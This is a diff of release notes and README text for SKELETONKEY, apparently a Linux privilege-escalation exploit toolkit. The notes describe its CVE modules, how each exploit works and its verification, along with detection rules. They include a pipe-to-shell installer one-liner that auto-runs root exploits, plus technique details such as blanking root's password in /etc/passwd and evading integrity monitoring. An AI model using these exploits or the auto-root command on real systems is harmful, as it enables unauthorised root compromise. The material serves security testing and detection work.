| CVE-2026-46300 | CWE-787 | `fragnesia_cve_2026_46300` |
|
||||
| CVE-2026-46333 | CWE-269 | `ptrace_pidfd_cve_2026_46333` |
|
||||
| CVE-2026-64600 | ? | `refluxfs_cve_2026_64600` |
|
||||
|
||||
@@ -26,6 +26,7 @@ haven't been maintained in years.
|
||||
|
||||
```bash
|
||||
curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \
|
||||
&& export PATH="$HOME/.local/bin:$PATH" \
|
||||
&& skeletonkey --auto --i-know
|
||||
```
|
||||
|
||||
|
||||
@@ -1,3 +1,448 @@
|
||||
## SKELETONKEY v0.10.0 — the exploit-verification release
|
||||
|
||||
This release moves the corpus from **detect-verified** to **out-of-band
|
||||
exploit-verified**. Every headline claim below was witnessed in a VM by an
|
||||
independent root proof (a root-owned artifact, an `/etc/shadow` read, or a
|
||||
setuid-bash sentinel) — never by the module's own self-report. Full ledger:
|
||||
`docs/EXPLOITED.md`; per-run records: `docs/VERIFICATIONS.jsonl`.
|
||||
|
||||
### Headline: 11 modules confirmed landing `uid=0` out of band
|
||||
|
||||
| module | CVE | verified on |
|
||||
|---|---|---|
|
||||
| `refluxfs` | CVE-2026-64600 | Rocky 9.8 / 5.14.0-687 — `/etc/passwd` full chain |
|
||||
| `overlayfs` | CVE-2021-3493 | Ubuntu 20.04.0 / 5.4.0-26 — **direct uid=0 witness** |
|
||||
| `overlayfs_setuid` | CVE-2023-0386 | Ubuntu 22.04.0 / 5.15.0-25 — **rewritten (libfuse)** |
|
||||
| `pwnkit` | CVE-2021-4034 | Ubuntu 20.04.0 / polkit 0.105 — **fixed** |
|
||||
| `sudo_runas_neg1` | CVE-2019-14287 | Ubuntu 18.04.2 / sudo 1.8.21p2 |
|
||||
| `sudoedit_editor` | CVE-2023-22809 | Ubuntu 22.04.0 / sudo 1.9.9 — **fixed** |
|
||||
| `sudo_host` | CVE-2025-32462 | Ubuntu 22.04.0 / sudo 1.9.9 |
|
||||
| `ptrace_traceme` | CVE-2019-13272 | Ubuntu 18.04.0 / 4.15.0-50 — **rewritten** |
|
||||
| `sudo_samedit` | CVE-2021-3156 | Ubuntu 18.04.0 / sudo 1.8.21p2 — **rewritten (Baron Samedit)** |
|
||||
| `dirty_pipe` | CVE-2022-0847 | mainline 5.16.0 — **rewritten, 3 bugs fixed** |
|
||||
| `dirty_cow` | CVE-2016-5195 | mainline 4.8.0 — **rewritten, false-OK fixed** |
|
||||
|
||||
### Integrity: four modules were falsely claiming root — all fixed
|
||||
|
||||
A corpus-wide **false-`EXPLOIT_OK` audit** found four modules that reported
|
||||
success while obtaining **no root at all**, via the dispatcher's "an `execve`
|
||||
transferred, so treat it as success" path (the exec'd helper then failed):
|
||||
`pwnkit`, `ptrace_traceme`, `dirty_pipe`, `dirty_cow`. All four now verify root
|
||||
by an out-of-band artifact before claiming success. `dirty_pipe`/`dirty_cow`
|
||||
additionally reverted `/etc/passwd` via `drop_caches` (needs root) — as an
|
||||
unprivileged caller that **corrupted the running system's `/etc/passwd`**; both
|
||||
now revert through the Dirty Pipe/COW primitive itself, leaving the file
|
||||
byte-identical. The audit was then broadened to **every** `EXPLOIT_OK` site: all
|
||||
are now backed by a real check (root-owned artifact `stat`, `getxattr`
|
||||
bug-signature, `/etc/passwd` grep, `setuid(0)==0` gate, or page-cache
|
||||
`verify_plant`). No false positives remain.
|
||||
|
||||
### New / rewritten working exploits
|
||||
|
||||
- **`ptrace_traceme`** (CVE-2019-13272) — the shipped sequence had the mechanism
|
||||
backwards; rewritten to the Jann Horn/bcoles technique (child becomes
|
||||
non-degraded root via its own setuid-execve under a privileged tracer), lands
|
||||
real root.
|
||||
- **`sudo_samedit`** (CVE-2021-3156, "Baron Samedit") — the corpus's hardest
|
||||
userspace target; ported blasty's NSS `libnss_X` hijack, lands root as a
|
||||
non-sudoer on the first grooming attempt.
|
||||
- **`overlayfs_setuid`** (CVE-2023-0386) — rewritten with libfuse (setuid-root
|
||||
FUSE lower + overlay copy-up).
|
||||
- **`dirty_pipe`** / **`dirty_cow`** — rewritten to the reliable "known-hash into
|
||||
root's password field + `su` over a pty" escalation, with primitive-based
|
||||
revert; `dirty_cow` verified on a pre-4.8.3 kernel.
|
||||
|
||||
### Other fixes
|
||||
|
||||
- **Systemic userns bug** fixed in `cgroup_release_agent` + `af_packet2`:
|
||||
`getuid()`/`getgid()` were read *after* `unshare(CLONE_NEWUSER)` (→ 65534), so
|
||||
the `uid_map` write was rejected and userns-root silently failed.
|
||||
- **Offset resolver** (`core/offsets.c`): env-provided kernel offsets
|
||||
(`SKELETONKEY_MODPROBE_PATH`, …) were silently wiped under `kptr_restrict` (i.e.
|
||||
on every default host), blocking every `--full-chain` primitive. Fixed.
|
||||
- **Robust `su` helper**: the su-over-pty step now polls for the prompt with a
|
||||
hard 20s cap so a misbehaving `su` can never hang the module (and thus never
|
||||
block a revert). Latent `readback[16]` overflow fixed. `netfilter_xtcompat`
|
||||
now includes `<linux/if.h>` for `IFNAMSIZ` (builds on older kernel headers).
|
||||
- **`overlayfs`** upgraded from a `getxattr` proxy to a **direct uid=0 witness**.
|
||||
|
||||
### Kernel primitives — scope note
|
||||
|
||||
The ~13 kernel-primitive modules (`nf_tables` & friends) remain honest
|
||||
`EXPLOIT_FAIL` trigger/groom scaffolds. `nf_tables`' kernel was confirmed
|
||||
vulnerable and the offset plumbing fixed, but landing root needs a
|
||||
Notselwyn-scale port; and even the most tractable primitive
|
||||
(`netfilter_xtcompat`, CVE-2021-22555) needs its exact target kernel+config —
|
||||
Andy Nguyen's reference exploit does not land on mainline 5.4/5.8. These are
|
||||
per-target, per-primitive exploit-dev, documented in `docs/EXPLOITED.md`.
|
||||
|
||||
---
|
||||
|
||||
## SKELETONKEY v0.9.14 — new LPE module: refluxfs (CVE-2026-64600)
|
||||
|
||||
Adds **`refluxfs` — CVE-2026-64600 "RefluXFS"** (Qualys Threat Research Unit),
|
||||
taking the corpus to **46 modules / 41 CVEs** and opening a brand-new subsystem:
|
||||
**XFS reflink copy-on-write** (`fs/xfs/xfs_iomap.c`, `fs/xfs/xfs_reflink.c`). It
|
||||
is also the corpus's first **data-oriented** kernel bug — every other kernel
|
||||
entry in the set corrupts memory; this one corrupts file contents.
|
||||
|
||||
`xfs_direct_write_iomap_begin()` reads the data-fork extent map under `ILOCK`,
|
||||
then `xfs_reflink_fill_cow_hole()` **drops `ILOCK`** to allocate a transaction
|
||||
(i.e. to wait for log space). On re-acquiring it, the code re-queries the
|
||||
refcount btree at the **original** physical block number (`imap->br_startblock`)
|
||||
and **never re-reads the data fork**. A second `O_DIRECT` writer holding only the
|
||||
coarser `IOLOCK` can complete an entire CoW cycle inside that window — allocate
|
||||
block Y, write it, remap via `xfs_reflink_end_cow()` — leaving the first writer's
|
||||
mapping pointing at a block now owned solely by the reflink **source**. The stale
|
||||
lookup returns refcount `1`, the writer concludes the block is private, and
|
||||
writes to it in place, landing attacker data on the source file's on-disk blocks.
|
||||
|
||||
Three properties make this unlike anything else in the corpus:
|
||||
|
||||
- **No offsets, no ROP, no KASLR/SMEP/SMAP.** The primitive is an arbitrary
|
||||
overwrite of the *on-disk contents of any readable file*, so there is nothing
|
||||
to port per kernel build and no `--full-chain` offset entry to fill. Qualys is
|
||||
explicit that SELinux enforcing, container boundaries and seccomp are equally
|
||||
irrelevant: *"This isn't a vulnerability you can harden around, isolate, or
|
||||
live-patch."*
|
||||
- **File-integrity monitoring cannot see it.** The data is applied to the shared
|
||||
physical block *beneath* the victim inode. No `write(2)` ever targets it, so
|
||||
`mtime`/`ctime`/size are unchanged and nothing is logged — `-w /etc/passwd -p
|
||||
wa`, AIDE and Tripwire all stay silent. The change persists across reboots.
|
||||
- **The exposure is distro-shaped, not kernel-shaped.** What matters is whether
|
||||
XFS+reflink is the installer default: **RHEL/CentOS Stream/Rocky/AlmaLinux/
|
||||
Oracle/CloudLinux 8-10, Fedora Server ≥ 31 and Amazon Linux 2023** are
|
||||
exploitable out of the box; Debian, Ubuntu, Fedora Workstation, SLES, openSUSE
|
||||
and Arch default to ext4/btrfs and are not reachable. RHEL/CentOS 7 (3.10) was
|
||||
never affected.
|
||||
|
||||
Introduced **4.11** (2017-02, `3c68d44a2b49`) — a nine-year window. Fixed by
|
||||
`2f4acd0fcd86` ("xfs: resample the data fork mapping after cycling ILOCK"),
|
||||
merged **2026-07-16** for **7.2-rc4**; stable backports **7.1.4** / **6.18.39** /
|
||||
**6.12.96**. The 6.6 / 6.1 / 5.15 / 5.14 / 5.10 / 4.19 / 4.18 lines have no
|
||||
upstream stable fix in the CNA record at time of writing. CWE-362 → CWE-367; NVD
|
||||
published neither a CWE nor a CVSS vector at time of writing; not in CISA KEV.
|
||||
|
||||
🟢 **Full chain (`--full-chain`), 🟡 safe trigger by default — VM-verified
|
||||
end-to-end.** `--exploit refluxfs --i-know --full-chain` reflink-clones
|
||||
`/etc/passwd`, races the CoW window, strips root's password field on-disk
|
||||
(`root:x:` → `root::`, the public PoC's technique), evicts the stale page cache,
|
||||
and returns `EXPLOIT_OK`; `su root` with an empty password then yields uid 0.
|
||||
Confirmed on Rocky Linux 9.8 / `5.14.0-687.10.1.el9_8.0.1` — **3/3 wins** on a
|
||||
private-extent target (1244 / 3716 / 7913 rounds, 4–30 s) as unprivileged
|
||||
`uid=1000` under **SELinux Enforcing**, with every other passwd line preserved,
|
||||
the file backed up first and restored on failure (`--cleanup` restores after the
|
||||
pop). A naive port that truncates the tail would drop `sshd`/the caller and brick
|
||||
login; preserving every line is the implementation's key safety property.
|
||||
|
||||
**Exploitability constraint discovered during verification (not in the Qualys
|
||||
writeup):** the race only fires when the target's extent is **private** going in.
|
||||
An already-reflink-shared file keeps a post-CoW refcount > 1 and is not
|
||||
attackable via that target — some fresh cloud images ship `/etc/passwd`
|
||||
pre-shared (Rocky 9's did, and the attack failed against it across ~41 000
|
||||
rounds), while normal admin churn (`useradd`/`passwd`/`vipw`) rewrites it into
|
||||
the exploitable private-extent state. `detect() --active` now reports which state
|
||||
the target is in. Without `--full-chain` the module runs a safe own-files
|
||||
reachability trigger only (`EXPLOIT_FAIL`), deliberately under-driven.
|
||||
Unlike the corpus's other race
|
||||
modules, `detect()` is **not** a pure version gate: this bug's reachability is
|
||||
safely observable, so it pairs the three-branch version table with a **real
|
||||
storage precondition** — a writable directory on a mounted XFS filesystem,
|
||||
identified by `statfs(2)` `f_type == XFS_SUPER_MAGIC` and deliberately **not** by
|
||||
a successful `FICLONE`, since btrfs implements `FICLONE` too and is unaffected.
|
||||
No such directory → `PRECOND_FAIL`, the correct verdict on a stock Debian/Ubuntu
|
||||
host. Under `--active` it confirms `reflink=1` empirically; override with
|
||||
`SKELETONKEY_XFS_ASSUME_REFLINK=1/0`. On rpm-family hosts it warns explicitly
|
||||
that RHEL/Oracle/Rocky/Alma backport **without bumping the upstream version** (a
|
||||
patched el8 kernel still reports `4.18.0-*`), so the verdict reflects the
|
||||
upstream base version only — check the RHSA/ELSA/ALSA/RLSA erratum.
|
||||
|
||||
`exploit()` forks an isolated child that creates a private `mkdtemp` scratch
|
||||
directory and works **only on two files it owns**: **(A)** it writes a donor,
|
||||
`FICLONE`-clones it, and confirms the shared extent via **`FIEMAP_EXTENT_SHARED`**
|
||||
plus an `O_DIRECT` gate — a read-only, deterministic observation that the exact
|
||||
refcount state the bug misjudges exists here; then **(B)** it races **8**
|
||||
concurrent `O_DIRECT` 4 KiB writes against the clone with **2**
|
||||
`ftruncate`/`fdatasync` helpers cycling the `ILOCK`, for at most **16 rounds /
|
||||
2 s**, and stops — reading the donor back with `O_DIRECT`, because a buffered read
|
||||
would be served from the page cache the corruption bypasses and would hide a win.
|
||||
It is deliberately under-driven against the public PoC's 32 writers and 8
|
||||
helpers, and it **never clones or targets a file it does not own**: the step that
|
||||
yields root — reflink-cloning `/etc/passwd` and racing writes onto *its* shared
|
||||
blocks, then `su` — persistently rewrites a system file on disk with no undo, and
|
||||
is documented but **not bundled**. Always returns `EXPLOIT_FAIL`.
|
||||
|
||||
Note the safety inversion versus the other reconstructed triggers: a won race
|
||||
here corrupts **file data, not kernel memory**, so there is no oops, no KASAN
|
||||
report and no panic path, and the blast radius is 4 KiB of a scratch file the
|
||||
module then deletes. `refluxfs` therefore carries safety rank **55** — far above
|
||||
`bad_epoll` (12) and `ghostlock` (11) — and `--cleanup` sweeps any
|
||||
`skeletonkey-refluxfs-*` directories left by an interrupted run.
|
||||
|
||||
Detection gets a genuinely unusual treatment, because the obvious rule is the one
|
||||
that fails. auditd/sigma anchor on the two operations the attack cannot avoid —
|
||||
`ioctl` request **`0x40049409`** (`FICLONE`, matched exactly so it does not flood)
|
||||
and `openat` with `O_DIRECT` (`& 0x4000`) — plus the post-exploitation euid-0
|
||||
transition; falco adds the high-fidelity "reflinked a file owned by another user"
|
||||
condition. And for once the **yara** rule is the right tool for a kernel bug:
|
||||
since FIM is structurally blind here, it matches the *on-disk artifact* — a
|
||||
`passwd` file with a password-less root entry or an added uid-0 account. The
|
||||
module docs also recommend content-hash-vs-`mtime` drift monitoring, which is a
|
||||
near-zero-false-positive detector for this entire bug class.
|
||||
|
||||
14 new `detect()` unit rows cover the backport boundaries, the 4.11 introduction
|
||||
gate, the el8/el9 upstream bases, the "newer than some entries but not all" case,
|
||||
and the no-XFS `PRECOND_FAIL` path (**148 tests total, 0 failures**).
|
||||
|
||||
**VM-verified 2026-07-23 — the corpus's first rpm-family verification**, taking
|
||||
the empirical count to **29 of 41 CVEs**. Target: **Rocky Linux 9.8 /
|
||||
`5.14.0-687.10.1.el9_8.0.1.x86_64`** under qemu/KVM with 6 vCPUs. The stock
|
||||
GenericCloud layout needed **no provisioner changes at all** — root is
|
||||
`/dev/vda4` XFS with `reflink=1` out of the box, which is precisely why this CVE
|
||||
hits the RHEL family so broadly. `detect()` returned `VULNERABLE`, the
|
||||
rpm-family vendor-backport caveat fired, the `--active` FICLONE witness confirmed
|
||||
reflink, phase A observed `FIEMAP_EXTENT_SHARED` on a real shared extent, the
|
||||
scratch dir self-cleaned, and the source built clean on el9 gcc.
|
||||
|
||||
The **underlying bug was separately confirmed winnable** on that kernel: the
|
||||
`--full-chain` root pop above is the proof (the same race rewrote `/etc/passwd`,
|
||||
3/3). An earlier *non-destructive* measurement at the public PoC's parameters
|
||||
(32 writers / 8 helpers, 60 s), confined to two files the test user owned, won
|
||||
**4 out of 4 runs**, first divergence after **69, 114, 170 and 494 rounds** — a
|
||||
racing `O_DIRECT` write landing on a still-shared block and rewriting the donor's
|
||||
on-disk bytes, the arbitrary-overwrite primitive observed directly with no oops
|
||||
and no dmesg output (as expected for a data-oriented bug).
|
||||
|
||||
Worth stating plainly, because it is the whole point of the design: the shipped
|
||||
trigger **did not win** in its 2 s budget on a kernel that is provably
|
||||
vulnerable. That is intended under-driving, not a defect — and it is the concrete
|
||||
reason a non-win must **never** be recorded as "patched". Trust the version gate
|
||||
and the vendor erratum.
|
||||
|
||||
Credit: **Qualys Threat Research Unit** (blog by **Saeed Abbasi**; the technical
|
||||
advisory credits model-assisted kernel analysis performed with **Anthropic**),
|
||||
and the upstream XFS maintainers who fixed it.
|
||||
|
||||
---
|
||||
|
||||
## SKELETONKEY v0.9.13 — new LPE module: ghostlock (CVE-2026-43499)
|
||||
|
||||
Adds **`ghostlock` — CVE-2026-43499 "GhostLock"** (VEGA / Nebula Security,
|
||||
"IonStack part II"), taking the corpus to **45 modules / 40 CVEs** and opening a
|
||||
brand-new subsystem: **rtmutex / futex requeue-PI** (`kernel/locking/rtmutex.c`).
|
||||
It is also the corpus's first kernel-**stack** use-after-free — every other UAF
|
||||
in the set is heap/slab. On the `-EDEADLK` deadlock-rollback path,
|
||||
`remove_waiter()` operates on `current` instead of the actual waiter task while
|
||||
unwinding a proxy lock in `rt_mutex_start_proxy_lock()` (reached from
|
||||
`futex_requeue()`); if a concurrent PI-chain priority walk — driven from another
|
||||
CPU via `sched_setattr()` — runs at that instant, `pi_blocked_on` is cleared on
|
||||
the wrong task and an on-stack `rt_mutex_waiter` is left dangling, becoming a
|
||||
controlled kernel write when the rbtree is later rotated over the reused frame.
|
||||
Reachable by **any unprivileged user** (CVSS 7.8, PR:L) — plain `futex(2)` +
|
||||
`sched_setattr(2)`, no user namespace, no capability, only `CONFIG_FUTEX_PI`
|
||||
(universal). It has existed since PI-futex requeue landed in **2.6.39** — ~15
|
||||
years across every distribution. The public exploit weaponises it (Android/Pixel)
|
||||
via a "KernelSnitch" futex-bucket page leak → forged waiter → `struct file`
|
||||
`f_op` → configfs/ashmem R/W → pipe physical R/W → cred patch; ~97% stable on
|
||||
kernelCTF, $92,337. Introduced 2.6.39; fixed `3bfdc63936dd` (merged 7.1-rc1),
|
||||
stable backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175 — the
|
||||
5.15/5.10/5.4/4.19 LTS branches are affected with no upstream fix. CWE-416 (race
|
||||
root cause CWE-362); not in CISA KEV.
|
||||
|
||||
🟡 **Trigger (reconstructed) — reachability-only, deliberately under-driven, not
|
||||
VM-verified.** `detect()` is a pure kernel-version gate over a five-branch
|
||||
backport table (7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175, 7.1+ inherits
|
||||
mainline; 5.15/5.10/5.4/4.19 affected with no fix; < 2.6.39 not affected) — no
|
||||
userns/CONFIG probe (`CONFIG_FUTEX_PI` assumed). `exploit()` forks an isolated
|
||||
child that **(A)** deterministically confirms the `-EDEADLK` `remove_waiter()`
|
||||
rollback path is reachable — a **safe** witness, since without a concurrent
|
||||
priority walk the unwind creates no dangling pointer (validated on real hardware:
|
||||
the requeue-PI cycle returns `-EDEADLK` reliably) — then **(B)** exercises the
|
||||
actual race a hard-bounded 24 iterations / 2 s with a sibling-CPU
|
||||
`sched_setattr(SCHED_BATCH)` storm, and stops. It does **not** widen the
|
||||
`copy_from_user` window (no memfd/`PUNCH_HOLE`), does **not** spray or reoccupy
|
||||
the freed stack frame, and does **not** bundle the KernelSnitch leak →
|
||||
forged-waiter → fops/configfs/ashmem/pipe R/W → cred-patch chain (Android/Pixel-
|
||||
specific, per-build offsets). Returns `EXPLOIT_FAIL`. It carries the corpus's
|
||||
**lowest `--auto` safety rank (11)** — a won race corrupts the kernel stack and
|
||||
drives a near-arbitrary pointer write (near-certain panic), so `--auto` only
|
||||
reaches for it after every safer vulnerable module. Unlike most kernel races
|
||||
GhostLock has a **real detection signature**: a futex requeue-PI op returning
|
||||
`-EDEADLK` (glibc never provokes this) plus tight-loop
|
||||
`sched_setattr(SCHED_BATCH)` on a sibling thread — the shipped auditd/sigma rules
|
||||
anchor on `sched_setattr` + the post-exploitation euid-0 transition, the
|
||||
falco/eBPF rule on the requeue-PI-EDEADLK tell; no yara. Wired: registry,
|
||||
Makefile, safety rank (11), 9 `detect()` test rows (incl. the multi-branch
|
||||
"newer than all" case 6.13.0 → VULNERABLE), CVE metadata (CWE-416 / T1068 /
|
||||
not-KEV), README + CVES.md + website counts (45/40), RELEASE_NOTES v0.9.13, and a
|
||||
verify-vm target (sweep pending). Also corrects pre-existing website drift left
|
||||
by v0.9.12 (index.html body counts + the missing `bad_epoll` corpus pill).
|
||||
Credits VEGA / Nebula Security + the upstream fix `3bfdc63936dd`.
|
||||
|
||||
## SKELETONKEY v0.9.12 — new LPE module: bad_epoll (CVE-2026-46242)
|
||||
|
||||
Adds **`bad_epoll` — CVE-2026-46242 "Bad Epoll"** (Jaeyoung Chung /
|
||||
`J-jaeyoung`, submitted to Google's kernelCTF), taking the corpus to **44
|
||||
modules / 39 CVEs** and opening a brand-new subsystem: **epoll /
|
||||
`fs/eventpoll.c`**. A race-condition use-after-free on the file-teardown
|
||||
path — `ep_remove()` clears `file->f_ep` under `file->f_lock` but keeps
|
||||
using the file inside the critical section (`hlist_del_rcu()` +
|
||||
`spin_unlock()`), so a concurrent `__fput()` observes the transient NULL,
|
||||
skips `eventpoll_release_file()`, and frees a `struct eventpoll` still in
|
||||
use. The public exploit weaponises the 8-byte UAF write via a cross-cache
|
||||
attack to a `struct file`, arbitrary kernel read through
|
||||
`/proc/self/fdinfo`, and a ROP chain — ~99% reliable through a
|
||||
~6-instruction window, and reachable by **any unprivileged user with no
|
||||
user namespace, no CONFIG, and no capability** (which also means there is
|
||||
no unprivileged-userns stopgap — the only fix is to patch). Introduced by
|
||||
`58c9b016e128` (Linux 6.4); fixed by `a6dc643c6931` (merged 7.1-rc1),
|
||||
stable backport 7.0.13. CWE-416 (race root cause CWE-362); not in CISA
|
||||
KEV. Also affects Android.
|
||||
|
||||
🟡 **Trigger (reconstructed) — deliberately under-driven, primitive-only,
|
||||
not VM-verified.** A *won* race frees a live `struct eventpoll` — real
|
||||
memory corruption that rarely trips KASAN, so a completed race can
|
||||
silently destabilise a vulnerable host. `detect()` is therefore a pure
|
||||
kernel-version gate (vulnerable iff ≥ 6.4 and below the fix on-branch;
|
||||
stable backport 7.0.13, 7.1+ inherits; 6.1/5.10 not affected) with **no
|
||||
active probe** — there is no safe way to distinguish vulnerable from
|
||||
patched without winning the race. `exploit()` forks a CPU-pinned child
|
||||
that builds the epoll race pair and exercises the `ep_remove`-vs-`__fput`
|
||||
concurrent-close window a **hard-bounded** 48 attempts / 2 s (widened with
|
||||
`close(dup())` false-sharing storms), snapshots the eventpoll slab, and
|
||||
returns `EXPLOIT_FAIL`; it does not grind the race to a win, does not do
|
||||
the cross-cache reclaim, and does not bundle the `fdinfo` arbitrary-read +
|
||||
ROP root-pop (per-build offsets refused). It carries the corpus's
|
||||
**lowest `--auto` safety rank (12)** — a kernel race that frees a live
|
||||
`struct file` is the least predictable class, so `--auto` only reaches for
|
||||
it after every safer vulnerable module. Detection is intentionally
|
||||
weak/structural (epoll syscalls are ubiquitous and the exploit rarely
|
||||
trips KASAN) — the shipped auditd/sigma/falco rules key on the
|
||||
post-exploitation euid-0 transition, with no yara; treat this as much as a
|
||||
blue-team "your stack is nearly blind to this" teaching case as an
|
||||
offensive one. Wired: registry, Makefile, safety rank (12), 5 `detect()`
|
||||
test rows (version gating), CVE metadata (CWE-416 / T1068 / not-KEV),
|
||||
README + CVES.md + website counts (44/39), RELEASE_NOTES v0.9.12, and a
|
||||
verify-vm target (sweep pending). Credits Jaeyoung Chung + the upstream
|
||||
fix in `NOTICE.md`. Reconstructed from the public kernelCTF PoC and not
|
||||
VM-verified, so the verified count stays 28 of 39.
|
||||
|
||||
## SKELETONKEY v0.9.11 — new LPE module: nft_catchall (CVE-2026-23111)
|
||||
|
||||
Adds **`nft_catchall` — CVE-2026-23111**, taking the corpus to **43
|
||||
modules / 38 CVEs**. The newest nftables LPE: a **use-after-free** in the
|
||||
nf_tables transaction-abort path. `nft_map_catchall_activate()` carries an
|
||||
inverted condition (a stray `!`) so the abort path processes *active*
|
||||
catch-all map elements instead of skipping them — a catch-all GOTO element
|
||||
drives a chain's use-count to zero, and a following `DELCHAIN` frees the
|
||||
chain while the catch-all verdict still references it → UAF. From an
|
||||
unprivileged user (user namespaces + nftables) it escalates to root via a
|
||||
`modprobe_path` / `selinux_state` ROP. Fixed upstream by commit `f41c5d1`;
|
||||
CWE-416, CVSS 7.8; not in CISA KEV. Public reproduction + analysis by
|
||||
**FuzzingLabs**.
|
||||
|
||||
🟡 **Trigger (reconstructed) — primitive-only, not VM-verified.** This is
|
||||
one more UAF in the corpus's most-covered subsystem (`nf_tables`,
|
||||
`nft_set_uaf`, `nft_payload`, `nft_pipapo`, …) and ships on the same
|
||||
contract as `nf_tables` (CVE-2024-1086): a fork-isolated trigger that
|
||||
fires the bug class and stops. `detect()` version-gates against the
|
||||
Debian backports (upstream thresholds 6.1.164 / 6.12.73 / 6.18.10;
|
||||
catch-all set elements arrived ~5.13) **and** requires unprivileged
|
||||
user-namespace clone — a vulnerable kernel with userns locked down is
|
||||
`PRECOND_FAIL`. `exploit()` builds a verdict map with a catch-all GOTO
|
||||
element and provokes an aborting batch transaction to drive the abort-path
|
||||
UAF, observes slabinfo, and returns `EXPLOIT_FAIL`. The per-kernel leak +
|
||||
arbitrary-R/W + `modprobe_path` ROP is **not** bundled (per-build offsets
|
||||
refused), and the trigger is reconstructed from the public analysis rather
|
||||
than VM-verified — it never claims root it did not get. Ships auditd +
|
||||
sigma + falco rules, ATT&CK T1068 + CWE-416 metadata, six new `detect()`
|
||||
unit-test rows (version + userns gating), credits FuzzingLabs + the
|
||||
upstream fix in `NOTICE.md`, and a verify-vm target (sweep pending). Not
|
||||
VM-verified, so the verified count stays 28 of 38.
|
||||
|
||||
## SKELETONKEY v0.9.10 — new LPE module: cifswitch (CVE-2026-46243)
|
||||
|
||||
Adds **`cifswitch` — CVE-2026-46243 "CIFSwitch"** (Asim Manizada,
|
||||
2026-05-28), taking the corpus to **42 modules / 37 CVEs**. The newest
|
||||
kernel-7-era LPE not already covered: a ~19-year-old logic flaw in
|
||||
`fs/smb/client/cifs_spnego.c` where the `cifs.spnego` request-key type
|
||||
accepts key descriptions created by *userspace* (`add_key(2)` /
|
||||
`request_key(2)`) without verifying the request came from the in-kernel
|
||||
CIFS client. The description carries authority-bearing fields
|
||||
(`pid`/`uid`/`creduid`/`upcall_target`) that the root `cifs.upcall`
|
||||
helper trusts as kernel-originating; combined with user+mount namespace
|
||||
tricks, an unprivileged user coerces `cifs.upcall` into loading an
|
||||
attacker NSS module as root. Fixed upstream by `3da1fdf4efbc` (merged
|
||||
7.1-rc5); NVD class CWE-20; not in CISA KEV.
|
||||
|
||||
🟡 **Honest port — full chain not VM-verified.** `detect()` gates on the
|
||||
kernel version (Debian backports 5.10.257 / 6.1.174 / 6.12.90 / 7.0.10)
|
||||
**and** on the presence of the vulnerable userspace path — a vulnerable
|
||||
kernel without `cifs-utils` reports `PRECOND_FAIL`, not a false
|
||||
`VULNERABLE` (override the probe with `SKELETONKEY_CIFS_ASSUME_PRESENT=1`
|
||||
/`0`). `exploit()` fires only the non-destructive primitive — `add_key(2)`
|
||||
of a forged-but-benign `cifs.spnego` key, which does **not** invoke
|
||||
`cifs.upcall` and loads nothing, revoked immediately — and treats a clean
|
||||
accept as the empirical witness that userspace can forge the
|
||||
authority-bearing key type. It then stops: the namespace-switch +
|
||||
malicious-NSS-load root-pop is target/config-specific and is not bundled
|
||||
until VM-verified, so it returns honest `EXPLOIT_FAIL` without a euid-0
|
||||
witness (never fabricates root). `--mitigate` blocklists the `cifs`
|
||||
module (`/etc/modprobe.d/skeletonkey-disable-cifs.conf`); `--cleanup`
|
||||
reverts. Structural, arch-agnostic (keyring + namespace logic, no
|
||||
shellcode). Ships auditd + sigma + falco rules, MITRE ATT&CK T1068 +
|
||||
CWE-20 metadata, six new `detect()` unit-test rows, and credits Asim
|
||||
Manizada in `NOTICE.md`. **Partially VM-verified** (2026-06-08, Ubuntu
|
||||
24.04.4 / kernel 6.8.0-117, QEMU/HVF): `detect()`'s precondition + version
|
||||
gating and the `add_key` primitive are confirmed — an independent
|
||||
`python3` `ctypes` `add_key("cifs.spnego", …)` was accepted and the
|
||||
module's `exploit()` reported "primitive CONFIRMED" then honest
|
||||
`EXPLOIT_FAIL`. The full namespace+NSS root-pop and a patched-kernel
|
||||
discriminator check remain pending, so cifswitch is **not** counted as a
|
||||
verified end-to-end CVE — the verified count stays 28 of 37. Details in
|
||||
the module `NOTICE.md` and `tools/verify-vm/targets.yaml`.
|
||||
|
||||
## SKELETONKEY v0.9.9 — install.sh needs no root; CVE-2022-0492 KEV drift
|
||||
|
||||
Two maintenance fixes, no new modules.
|
||||
|
||||
**`install.sh` never escalates to sudo.** SKELETONKEY is a privilege-
|
||||
escalation tool — the operator by definition does *not* have root yet, so
|
||||
the installer must not demand it. The old default wrote to `/usr/local/bin`
|
||||
and fell back to `sudo mv` when that wasn't writable, prompting for a
|
||||
password on exactly the unprivileged accounts this tool targets. It now
|
||||
installs sudo-free: `/usr/local/bin` is used only when already writable,
|
||||
otherwise it falls back to a per-user `$HOME/.local/bin` (honoring
|
||||
`XDG_BIN_HOME`), created as needed. An explicit `SKELETONKEY_PREFIX` is
|
||||
honored exactly and errors rather than escalating if unwritable. When the
|
||||
chosen dir isn't on `$PATH` the installer prints the absolute path, and the
|
||||
documented `curl … | sh && skeletonkey --auto --i-know` one-liner now
|
||||
prepends `$HOME/.local/bin` to `$PATH` so it resolves on a fresh login. The
|
||||
quickstart no longer prefixes `sudo` to `--scan`/`--audit`/`--auto` —
|
||||
detection and escalation run as the unprivileged user; only writing audit
|
||||
rules into `/etc/audit` legitimately needs root.
|
||||
|
||||
**Federal metadata drift (the failing scheduled build).** The weekly
|
||||
`drift-check` caught two upstream changes since v0.9.8:
|
||||
|
||||
- **CVE-2022-0492 entered CISA KEV (2026-06-02).** The cgroup v1
|
||||
`release_agent` container-escape (`cgroup_release_agent`) is now on the
|
||||
Known Exploited Vulnerabilities catalog. The corpus reports **13 of 36**
|
||||
modules covering KEV-listed CVEs (was 12).
|
||||
- **CVE-2026-46333 gained a CWE.** When `ptrace_pidfd` was added two weeks
|
||||
after disclosure, NVD had not yet classified it; it is now **CWE-269**
|
||||
(Improper Privilege Management).
|
||||
|
||||
A third, latent cause kept the gate red even after those two: when
|
||||
`sudo_host` (CVE-2025-32462) was added in v0.9.8 its record was appended to
|
||||
the *end* of `CVE_METADATA.json`, but the drift check compares the record
|
||||
list in `discover_cves()`'s sorted order — so the out-of-order entry read
|
||||
as drift regardless of its values. Regenerating via the script restores
|
||||
sorted order.
|
||||
|
||||
Refreshed `CVE_METADATA.json`, the generated `cve_metadata.c` table, and
|
||||
`KEV_CROSSREF.md` accordingly (README + website counts updated).
|
||||
|
||||
